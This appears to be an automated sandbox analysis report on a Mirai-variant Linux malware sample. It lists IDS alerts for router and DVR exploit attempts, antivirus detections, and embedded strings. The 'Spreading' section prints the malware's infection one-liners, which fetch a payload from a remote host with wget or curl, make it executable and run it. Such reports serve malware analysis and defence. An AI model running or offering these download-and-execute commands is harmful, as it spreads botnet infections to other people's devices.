                            2024-11-28T07:28:52.513208+010020290341Web Application Attack192.168.2.235163056.179.245.1845555TCP
                            2024-11-28T07:28:52.513587+010020290341Web Application Attack192.168.2.2334620191.143.159.1718080TCP
                            2024-11-28T07:28:52.518329+010020290341Web Application Attack192.168.2.2344932170.86.222.19480TCP
                            2024-11-28T07:28:52.518694+010020290341Web Application Attack192.168.2.2335872179.139.60.24649152TCP
                            2024-11-28T07:28:52.549855+010020290341Web Application Attack192.168.2.235248845.201.111.1387574TCP
                            2024-11-28T07:28:52.550230+010020290341Web Application Attack192.168.2.2353836165.78.188.577574TCP
                            2024-11-28T07:28:52.586761+010020290341Web Application Attack192.168.2.2358350159.209.117.21680TCP
                            2024-11-28T07:28:52.596372+010020290341Web Application Attack192.168.2.2352776199.231.185.5249152TCP
                            2024-11-28T07:28:53.527429+010020290341Web Application Attack192.168.2.2342862193.56.195.35555TCP
                            2024-11-28T07:28:53.532605+010020290341Web Application Attack192.168.2.234917261.157.149.1188080TCP
                            2024-11-28T07:28:53.535181+010020290341Web Application Attack192.168.2.2355176173.109.36.2235555TCP
                            2024-11-28T07:28:53.562267+010020290341Web Application Attack192.168.2.235008061.52.194.2338080TCP
                            2024-11-28T07:28:53.581226+010020290341Web Application Attack192.168.2.2336844196.241.64.2235555TCP
                            2024-11-28T07:28:53.588134+010020290341Web Application Attack192.168.2.2359186203.55.84.1008080TCP
                            2024-11-28T07:28:53.606799+010020290341Web Application Attack192.168.2.234858043.138.13.595555TCP
                            2024-11-28T07:28:54.520005+010020290341Web Application Attack192.168.2.23565688.169.9.1367574TCP
                            2024-11-28T07:28:54.539355+010020290341Web Application Attack192.168.2.2359082189.96.186.1018080TCP
                            2024-11-28T07:28:54.557927+010020290341Web Application Attack192.168.2.2360970132.235.32.535555TCP
                            2024-11-28T07:28:54.559757+010020290341Web Application Attack192.168.2.2358140143.80.92.3780TCP
                            2024-11-28T07:28:54.560133+010020290341Web Application Attack192.168.2.2356124125.3.202.545555TCP
                            2024-11-28T07:28:54.569430+010020290341Web Application Attack192.168.2.235411822.231.22.1227574TCP
                            2024-11-28T07:28:54.591281+010020290341Web Application Attack192.168.2.2348022145.44.151.2437574TCP
                            2024-11-28T07:28:54.600602+010020290341Web Application Attack192.168.2.234951240.167.252.1865555TCP
                            2024-11-28T07:28:54.612641+010020290341Web Application Attack192.168.2.2341590124.211.152.1549152TCP
                            2024-11-28T07:28:55.243263+010020290341Web Application Attack192.168.2.2342992218.237.39.877574TCP
                            2024-11-28T07:28:55.505373+010020290341Web Application Attack192.168.2.2347254170.189.236.3980TCP
                            2024-11-28T07:28:55.512991+010020290341Web Application Attack192.168.2.234424051.93.70.19780TCP
                            2024-11-28T07:28:55.513360+010020290341Web Application Attack192.168.2.2336786168.241.230.88080TCP
                            2024-11-28T07:28:55.514464+010020290341Web Application Attack192.168.2.2359722172.158.193.2268080TCP
                            2024-11-28T07:28:55.524626+010020290341Web Application Attack192.168.2.2359732147.111.155.649152TCP
                            2024-11-28T07:28:55.526093+010020290341Web Application Attack192.168.2.2333198115.246.201.15549152TCP
                            2024-11-28T07:28:55.562930+010020290341Web Application Attack192.168.2.2355080180.113.118.2137574TCP
                            2024-11-28T07:28:55.566548+010020290341Web Application Attack192.168.2.234177840.164.246.1617574TCP
                            2024-11-28T07:28:55.577093+010020290341Web Application Attack192.168.2.2359866211.138.21.1980TCP
                            2024-11-28T07:28:55.584752+010020290341Web Application Attack192.168.2.2341926171.169.146.1578080TCP
                            2024-11-28T07:28:55.588397+010020290341Web Application Attack192.168.2.2349574140.158.65.1998080TCP
                            2024-11-28T07:28:55.598049+010020290341Web Application Attack192.168.2.235476429.239.31.16180TCP
                            2024-11-28T07:28:55.606082+010020290341Web Application Attack192.168.2.2345630183.52.110.3449152TCP
                            2024-11-28T07:28:56.513090+010020290341Web Application Attack192.168.2.2349176125.200.222.10149152TCP
                            2024-11-28T07:28:56.523677+010020290341Web Application Attack192.168.2.234495431.231.192.6180TCP
                            2024-11-28T07:28:56.539375+010020290341Web Application Attack192.168.2.234185286.150.230.14180TCP
                            2024-11-28T07:28:56.572793+010020290341Web Application Attack192.168.2.235397614.51.67.1657574TCP
                            2024-11-28T07:28:56.577246+010020290341Web Application Attack192.168.2.2342638135.158.93.9149152TCP
                            2024-11-28T07:28:56.579514+010020290341Web Application Attack192.168.2.2341808175.147.95.2780TCP
                            2024-11-28T07:28:56.585101+010020290341Web Application Attack192.168.2.2338508115.145.51.1967574TCP
                            2024-11-28T07:28:56.597338+010020290341Web Application Attack192.168.2.234319620.189.75.25249152TCP
                            2024-11-28T07:28:56.598148+010020290341Web Application Attack192.168.2.2341222176.37.130.580TCP
                            2024-11-28T07:28:56.598553+010020290341Web Application Attack192.168.2.2332792135.114.48.838080TCP
                            2024-11-28T07:28:56.599310+010020290341Web Application Attack192.168.2.235539083.115.151.787574TCP
                            2024-11-28T07:28:56.791046+010020290341Web Application Attack192.168.2.233938672.224.33.25180TCP
                            2024-11-28T07:28:57.501565+010020290341Web Application Attack192.168.2.233577468.59.165.167574TCP
                            2024-11-28T07:28:57.504106+010020290341Web Application Attack192.168.2.234534858.171.37.187574TCP
                            2024-11-28T07:28:58.338974+010020290341Web Application Attack192.168.2.2345816175.214.251.1465555TCP
                            2024-11-28T07:28:58.521479+010020290341Web Application Attack192.168.2.233591217.27.221.17574TCP
                            2024-11-28T07:28:58.543907+010020290341Web Application Attack192.168.2.233869080.152.5.1880TCP
                            2024-11-28T07:28:58.590168+010020290341Web Application Attack192.168.2.2349244102.225.249.9049152TCP
                            2024-11-28T07:28:58.604363+010020290341Web Application Attack192.168.2.2353030178.30.221.8049152TCP
                            2024-11-28T07:28:59.512085+010020290341Web Application Attack192.168.2.235279416.185.70.748080TCP
                            2024-11-28T07:28:59.514817+010020290341Web Application Attack192.168.2.2353128113.238.60.1215555TCP
                            2024-11-28T07:28:59.515217+010020290341Web Application Attack192.168.2.2340770187.128.167.1857574TCP
                            2024-11-28T07:28:59.517566+010020290341Web Application Attack192.168.2.2338230118.209.168.118080TCP
                            2024-11-28T07:28:59.523396+010020290341Web Application Attack192.168.2.2338976196.163.226.8649152TCP
                            2024-11-28T07:28:59.570627+010020290341Web Application Attack192.168.2.235325072.23.44.1345555TCP
                            2024-11-28T07:28:59.604975+010020290341Web Application Attack192.168.2.2349478163.150.75.778080TCP
                            2024-11-28T07:28:59.607011+010020290341Web Application Attack192.168.2.234001073.187.21.11380TCP
                            2024-11-28T07:28:59.992394+010020290341Web Application Attack192.168.2.235544273.29.227.1780TCP
                            2024-11-28T07:29:00.508147+010020290341Web Application Attack192.168.2.23597888.66.52.2108080TCP
                            2024-11-28T07:29:00.514391+010020290341Web Application Attack192.168.2.236015274.19.91.855555TCP
                            2024-11-28T07:29:00.555685+010020290341Web Application Attack192.168.2.2337988120.175.236.3880TCP
                            2024-11-28T07:29:00.566660+010020290341Web Application Attack192.168.2.2332942118.193.197.23549152TCP
                            2024-11-28T07:29:00.577973+010020290341Web Application Attack192.168.2.235441228.166.132.1047574TCP
                            2024-11-28T07:29:00.587056+010020290341Web Application Attack192.168.2.235857630.70.91.178080TCP
                            2024-11-28T07:29:00.591023+010020290341Web Application Attack192.168.2.2350314134.97.14.3449152TCP
                            2024-11-28T07:29:00.607211+010020290341Web Application Attack192.168.2.2360452182.147.12.937574TCP
                            2024-11-28T07:29:01.544509+010020290341Web Application Attack192.168.2.2340932135.197.45.1205555TCP
                            2024-11-28T07:29:01.545315+010020290341Web Application Attack192.168.2.2347522168.216.177.23680TCP
                            2024-11-28T07:29:01.548010+010020290341Web Application Attack192.168.2.234857637.176.230.2380TCP
                            2024-11-28T07:29:01.569841+010020290341Web Application Attack192.168.2.233753214.147.224.2949152TCP
                            2024-11-28T07:29:01.575885+010020290341Web Application Attack192.168.2.2334394200.218.252.2449152TCP
                            2024-11-28T07:29:01.619419+010020290341Web Application Attack192.168.2.2342270142.53.132.21549152TCP
                            2024-11-28T07:29:02.502841+010020290341Web Application Attack192.168.2.2359306120.90.51.1157574TCP
                            2024-11-28T07:29:02.514222+010020290341Web Application Attack192.168.2.234671857.18.210.1825555TCP
                            2024-11-28T07:29:02.530841+010020290341Web Application Attack192.168.2.2352754176.1.96.11780TCP
                            2024-11-28T07:29:02.565431+010020290341Web Application Attack192.168.2.234127263.30.95.1607574TCP
                            2024-11-28T07:29:02.568369+010020290341Web Application Attack192.168.2.23427028.196.111.677574TCP
                            2024-11-28T07:29:02.584200+010020290341Web Application Attack192.168.2.2347906205.169.229.1997574TCP
                            2024-11-28T07:29:02.589368+010020290341Web Application Attack192.168.2.2341182106.218.209.5780TCP
                            2024-11-28T07:29:02.602979+010020290341Web Application Attack192.168.2.2359192150.4.137.1487574TCP
                            2024-11-28T07:29:03.525015+010020290341Web Application Attack192.168.2.2349696119.179.80.1578080TCP
                            2024-11-28T07:29:03.544678+010020290341Web Application Attack192.168.2.234034258.119.101.967574TCP
                            2024-11-28T07:29:03.550153+010020290341Web Application Attack192.168.2.2339928103.61.153.1208080TCP
                            2024-11-28T07:29:03.555273+010020290341Web Application Attack192.168.2.2349378171.191.190.11480TCP
                            2024-11-28T07:29:03.555686+010020290341Web Application Attack192.168.2.2346966200.6.145.22980TCP
                            2024-11-28T07:29:03.558457+010020290341Web Application Attack192.168.2.2337800217.160.23.2580TCP
                            2024-11-28T07:29:03.576949+010020290341Web Application Attack192.168.2.234404252.188.254.767574TCP
                            2024-11-28T07:29:03.582490+010020290341Web Application Attack192.168.2.23548242.199.234.24880TCP
                            2024-11-28T07:29:03.596623+010020290341Web Application Attack192.168.2.233665696.87.223.2125555TCP
                            2024-11-28T07:29:03.605625+010020290341Web Application Attack192.168.2.2358514104.67.128.2185555TCP
                            2024-11-28T07:29:04.531514+010020290341Web Application Attack192.168.2.2336034104.221.2.19749152TCP
                            2024-11-28T07:29:04.537270+010020290341Web Application Attack192.168.2.233782434.173.168.2480TCP
                            2024-11-28T07:29:04.565729+010020290341Web Application Attack192.168.2.2357798118.35.71.13880TCP
                            2024-11-28T07:29:04.575916+010020290341Web Application Attack192.168.2.23589505.197.254.3580TCP
                            2024-11-28T07:29:04.581845+010020290341Web Application Attack192.168.2.2357404164.216.166.2480TCP
                            2024-11-28T07:29:04.591173+010020290341Web Application Attack192.168.2.2338832195.92.142.2749152TCP
                            2024-11-28T07:29:04.595446+010020290341Web Application Attack192.168.2.235542020.244.167.11949152TCP
                            2024-11-28T07:29:05.501538+010020290341Web Application Attack192.168.2.2356728200.166.34.1480TCP
                            2024-11-28T07:29:05.506992+010020290341Web Application Attack192.168.2.2339352179.153.247.1678080TCP
                            2024-11-28T07:29:05.520285+010020290341Web Application Attack192.168.2.2342466133.69.133.2368080TCP
                            2024-11-28T07:29:05.520651+010020290341Web Application Attack192.168.2.235832033.212.219.238080TCP
                            2024-11-28T07:29:05.539100+010020290341Web Application Attack192.168.2.2342816187.152.16.615555TCP
                            2024-11-28T07:29:05.558674+010020290341Web Application Attack192.168.2.2350652150.60.134.445555TCP
                            2024-11-28T07:29:05.569910+010020290341Web Application Attack192.168.2.233689015.46.179.1775555TCP
                            2024-11-28T07:29:05.588565+010020290341Web Application Attack192.168.2.2334798211.30.199.2007574TCP
                            2024-11-28T07:29:05.601854+010020290341Web Application Attack192.168.2.23426421.96.199.12580TCP
                            2024-11-28T07:29:06.502733+010020290341Web Application Attack192.168.2.2351926165.60.171.1875555TCP
                            2024-11-28T07:29:06.534832+010020290341Web Application Attack192.168.2.2355684103.248.72.1955555TCP
                            2024-11-28T07:29:06.535206+010020290341Web Application Attack192.168.2.233723832.128.238.55555TCP
                            2024-11-28T07:29:06.544084+010020290341Web Application Attack192.168.2.2355860111.226.30.528080TCP
                            2024-11-28T07:29:06.566122+010020290341Web Application Attack192.168.2.235767298.240.104.2458080TCP
                            2024-11-28T07:29:06.594872+010020290341Web Application Attack192.168.2.234919045.139.190.1438080TCP
                            2024-11-28T07:29:06.599966+010020290341Web Application Attack192.168.2.2341706112.184.37.2980TCP
                            2024-11-28T07:29:06.602510+010020290341Web Application Attack192.168.2.2335088121.41.156.21349152TCP
                            2024-11-28T07:29:06.603965+010020290341Web Application Attack192.168.2.2357144200.237.182.2297574TCP
                            2024-11-28T07:29:07.501702+010020290341Web Application Attack192.168.2.2339196109.43.118.11080TCP
                            2024-11-28T07:29:07.524983+010020290341Web Application Attack192.168.2.2338390189.55.0.25480TCP
                            2024-11-28T07:29:07.546279+010020290341Web Application Attack192.168.2.234565290.197.61.1378080TCP
                            2024-11-28T07:29:07.563149+010020290341Web Application Attack192.168.2.235208098.219.179.1575555TCP
                            2024-11-28T07:29:07.576297+010020290341Web Application Attack192.168.2.2351726184.196.160.2078080TCP
                            2024-11-28T07:29:07.590054+010020290341Web Application Attack192.168.2.2348402130.29.234.8780TCP
                            2024-11-28T07:29:07.590796+010020290341Web Application Attack192.168.2.235819864.151.229.1955555TCP
                            2024-11-28T07:29:07.599357+010020290341Web Application Attack192.168.2.234350233.236.32.14480TCP
                            2024-11-28T07:29:07.604497+010020290341Web Application Attack192.168.2.2354832101.251.159.16780TCP
                            2024-11-28T07:29:08.550980+010020290341Web Application Attack192.168.2.2337214188.5.181.4180TCP
                            2024-11-28T07:29:08.551392+010020290341Web Application Attack192.168.2.2342422102.116.67.980TCP
                            2024-11-28T07:29:08.553665+010020290341Web Application Attack192.168.2.23573804.229.116.788080TCP
                            2024-11-28T07:29:08.561124+010020290341Web Application Attack192.168.2.2343372163.144.70.1498080TCP
                            2024-11-28T07:29:08.593395+010020290341Web Application Attack192.168.2.2340420221.130.16.1380TCP
                            2024-11-28T07:29:08.610645+010020290341Web Application Attack192.168.2.233479233.77.3.1698080TCP
                            2024-11-28T07:29:09.502597+010020290341Web Application Attack192.168.2.2354254191.195.132.14680TCP
                            2024-11-28T07:29:09.520260+010020290341Web Application Attack192.168.2.2334774175.73.108.1708080TCP
                            2024-11-28T07:29:09.521017+010020290341Web Application Attack192.168.2.2333092213.187.115.1828080TCP
                            2024-11-28T07:29:09.521379+010020290341Web Application Attack192.168.2.23557623.218.135.11380TCP
                            2024-11-28T07:29:09.545260+010020290341Web Application Attack192.168.2.2340450215.34.57.1925555TCP
                            2024-11-28T07:29:09.556398+010020290341Web Application Attack192.168.2.233786290.52.251.2168080TCP
                            2024-11-28T07:29:09.556773+010020290341Web Application Attack192.168.2.23463425.74.176.1305555TCP
                            2024-11-28T07:29:09.559331+010020290341Web Application Attack192.168.2.2335096213.252.65.795555TCP
                            2024-11-28T07:29:09.584906+010020290341Web Application Attack192.168.2.2360230110.148.234.19749152TCP
                            2024-11-28T07:29:09.585282+010020290341Web Application Attack192.168.2.2336608159.165.151.1358080TCP
                            2024-11-28T07:29:09.608570+010020290341Web Application Attack192.168.2.2342018169.253.246.127574TCP
                            2024-11-28T07:29:09.609391+010020290341Web Application Attack192.168.2.234106091.61.95.1248080TCP
                            2024-11-28T07:29:10.541097+010020290341Web Application Attack192.168.2.235189270.94.186.1165555TCP
                            2024-11-28T07:29:10.542937+010020290341Web Application Attack192.168.2.2333572187.253.227.1068080TCP
                            2024-11-28T07:29:10.544660+010020290341Web Application Attack192.168.2.235269449.167.186.19080TCP
                            2024-11-28T07:29:10.556514+010020290341Web Application Attack192.168.2.2348494197.190.42.2335555TCP
                            2024-11-28T07:29:10.559101+010020290341Web Application Attack192.168.2.2337780181.247.46.1349152TCP
                            2024-11-28T07:29:10.566163+010020290341Web Application Attack192.168.2.2345490213.25.64.5749152TCP
                            2024-11-28T07:29:11.512245+010020290341Web Application Attack192.168.2.235697267.28.77.20580TCP
                            2024-11-28T07:29:11.543468+010020290341Web Application Attack192.168.2.233621852.95.18.14380TCP
                            2024-11-28T07:29:11.549749+010020290341Web Application Attack192.168.2.2341628115.81.84.20580TCP
                            2024-11-28T07:29:11.585768+010020290341Web Application Attack192.168.2.233279212.97.253.380TCP
                            2024-11-28T07:29:11.595898+010020290341Web Application Attack192.168.2.2335578117.133.107.18049152TCP
                            2024-11-28T07:29:11.606579+010020290341Web Application Attack192.168.2.233446412.19.214.13549152TCP
                            2024-11-28T07:29:12.449153+010020290341Web Application Attack192.168.2.2333070210.216.128.1518080TCP
                            2024-11-28T07:29:12.511978+010020290341Web Application Attack192.168.2.2344776183.87.126.08080TCP
                            2024-11-28T07:29:12.512862+010020290341Web Application Attack192.168.2.236095434.170.202.16180TCP
                            2024-11-28T07:29:12.518531+010020290341Web Application Attack192.168.2.235747255.176.226.1258080TCP
                            2024-11-28T07:29:12.540111+010020290341Web Application Attack192.168.2.23571322.2.202.737574TCP
                            2024-11-28T07:29:12.572748+010020290341Web Application Attack192.168.2.2338532102.23.232.9849152TCP
                            2024-11-28T07:29:12.595258+010020290341Web Application Attack192.168.2.235569473.109.193.1915555TCP
                            2024-11-28T07:29:13.511690+010020290341Web Application Attack192.168.2.2355280100.142.210.2407574TCP
                            2024-11-28T07:29:13.561237+010020290341Web Application Attack192.168.2.234943215.59.214.2437574TCP
                            2024-11-28T07:29:13.596786+010020290341Web Application Attack192.168.2.2349570125.112.19.227574TCP
                            2024-11-28T07:29:14.528605+010020290341Web Application Attack192.168.2.234673492.192.162.23180TCP
                            2024-11-28T07:29:14.565630+010020290341Web Application Attack192.168.2.2359798112.48.44.05555TCP
                            2024-11-28T07:29:14.587573+010020290341Web Application Attack192.168.2.2344646181.20.68.24549152TCP
                            2024-11-28T07:29:14.603650+010020290341Web Application Attack192.168.2.233694448.235.98.9380TCP
                            2024-11-28T07:29:15.444769+010020290341Web Application Attack192.168.2.2348048121.126.110.1625555TCP
                            2024-11-28T07:29:15.503515+010020290341Web Application Attack192.168.2.2357530175.166.167.20880TCP
                            2024-11-28T07:29:15.507898+010020290341Web Application Attack192.168.2.234937250.114.132.22180TCP
                            2024-11-28T07:29:15.525558+010020290341Web Application Attack192.168.2.233663266.202.254.2528080TCP
                            2024-11-28T07:29:15.550336+010020290341Web Application Attack192.168.2.234832621.221.5.2049152TCP
                            2024-11-28T07:29:15.553852+010020290341Web Application Attack192.168.2.2341082152.141.41.15380TCP
                            2024-11-28T07:29:15.566106+010020290341Web Application Attack192.168.2.234529429.139.64.775555TCP
                            2024-11-28T07:29:15.578953+010020290341Web Application Attack192.168.2.2333818155.239.231.2548080TCP
                            2024-11-28T07:29:15.611410+010020290341Web Application Attack192.168.2.234037836.82.170.5980TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: bin.sh.elfAvira: detected
                            Source: /usr/networksAvira: detection malicious, Label: EXP/ELF.Mirai.O
                            Source: bin.sh.elfReversingLabs: Detection: 65%

                            Spreading

                            barindex
                            Source: /tmp/bin.sh.elf (PID: 6257)Opens: /proc/net/routeJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6257)Opens: /proc/net/routeJump to behavior
                            Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: bin.sh.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: networks.34.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: networks.34.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: networks.34.drString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36606 -> 12.244.152.154:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45422 -> 158.228.53.169:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38690 -> 177.200.207.58:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58364 -> 108.165.239.251:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38690 -> 177.200.207.58:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57246 -> 119.215.99.156:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48422 -> 13.35.2.160:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59688 -> 166.249.145.160:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41564 -> 92.194.65.27:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53158 -> 54.104.73.193:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44670 -> 106.43.212.137:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38606 -> 105.13.161.144:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:34298 -> 97.91.236.206:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52432 -> 159.99.163.111:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40018 -> 175.170.71.155:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44448 -> 203.238.209.21:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:37608 -> 73.230.184.19:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55030 -> 35.184.146.118:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52188 -> 117.244.40.134:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52188 -> 117.244.40.134:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43880 -> 191.213.172.77:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48626 -> 107.201.204.124:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52900 -> 143.207.148.54:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36276 -> 79.128.124.157:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34086 -> 75.89.77.206:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60608 -> 28.115.34.207:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:44886 -> 101.189.50.38:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38496 -> 31.195.52.61:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40038 -> 201.195.59.217:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34066 -> 64.173.83.170:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50332 -> 116.81.240.7:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47412 -> 28.196.179.23:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58462 -> 170.20.179.231:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56088 -> 186.96.78.186:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44862 -> 214.89.56.229:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45596 -> 158.60.86.218:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48312 -> 38.198.165.69:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:55732 -> 27.105.227.249:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48846 -> 114.17.69.181:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:49060 -> 121.95.76.250:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50660 -> 114.117.212.4:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32980 -> 122.187.139.190:80
